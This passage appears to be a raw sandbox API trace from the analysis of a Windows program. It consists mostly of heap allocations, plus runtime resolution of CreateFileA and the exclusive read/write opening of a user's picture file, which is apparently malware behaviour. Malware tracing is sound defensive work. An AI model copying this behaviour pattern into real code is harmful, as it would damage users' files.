hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0040.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce50 [0040.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0040.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0040.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0040.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0040.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0040.064] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0040.064] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0040.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0040.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0040.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0040.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0040.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0040.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0040.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0040.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0040.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0040.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0040.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0040.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0040.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0040.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0040.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0040.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0040.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0040.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0040.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0040.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0040.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0040.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0040.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0040.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0040.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0040.065] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0040.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0040.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0040.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0040.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0040.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0040.066] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0040.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0040.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0040.066] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0040.066] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0040.066] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0040.066] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0040.066] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0040.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0040.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0040.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0040.066] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0040.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0040.066] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0040.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0040.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0040.066] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0040.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0040.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0040.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0040.066] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0040.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0040.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0040.066] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0040.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0040.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0040.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0040.066] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0040.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0040.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0040.067] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0040.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0040.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0040.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0040.067] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0040.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0040.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0040.067] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0040.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0040.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0040.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0040.067] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0040.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0040.067] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0040.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0040.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0040.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0040.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0040.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0040.068] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0040.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0040.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0040.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0040.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0040.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0040.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0040.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0040.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0040.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0040.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0040.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0040.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0040.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0040.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0040.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0040.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0040.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0040.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0040.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0040.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0040.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0040.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0040.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0040.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0040.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0040.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0040.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0040.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0040.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0040.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0040.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0040.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0040.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0040.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0040.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0040.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0040.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0040.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0040.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0040.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0040.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0040.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0040.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0040.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0040.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0040.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0040.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0040.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0040.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0040.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0040.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0040.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0040.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0040.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0040.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0040.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0040.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0040.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0040.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0040.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0040.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0040.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0040.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0040.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0040.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0040.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0040.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0040.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0040.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0040.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0040.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0040.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0040.070] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0040.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0040.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0040.070] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0040.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88ca00 [0040.070] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88ca00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0040.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0040.070] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0040.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0040.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0040.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0040.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0040.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0040.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0040.071] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0040.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ca00 [0040.071] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88ca00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0040.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0040.071] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0040.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0040.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0040.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0040.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0040.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0040.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0040.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0040.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0040.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0040.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0040.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0040.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0040.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xab2010 [0040.072] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg", cchWideChar=103, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 103 [0040.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x67) returned 0x7c10a8 [0040.072] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg", cchWideChar=103, lpMultiByteStr=0x7c10a8, cbMultiByte=103, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg", lpUsedDefaultChar=0x0) returned 103 [0040.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c10a8 | out: hHeap=0x770000) returned 1 [0040.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0040.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0040.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0040.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0040.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0040.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0040.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0040.072] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\4hhx5h ujxbt\\a-rptl9rgzl\\eqssafks-mgdt6pjw\\zfzfoo26_z1.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0040.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0040.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0040.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0040.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0040.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0040.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0040.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0040.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0040.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0040.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0040.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0040.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0040.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0040.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0040.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=103, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 103 [0040.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xce) returned 0x791190 [0040.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=103, lpWideCharStr=0x791190, cchWideChar=103 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg") returned 103 [0040.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0040.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xd0) returned 0x791268 [0040.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x791190 | out: hHeap=0x770000) returned 1 [0040.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0040.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0040.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0040.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0040.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0040.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0040.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0040.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0040.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0040.073] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) 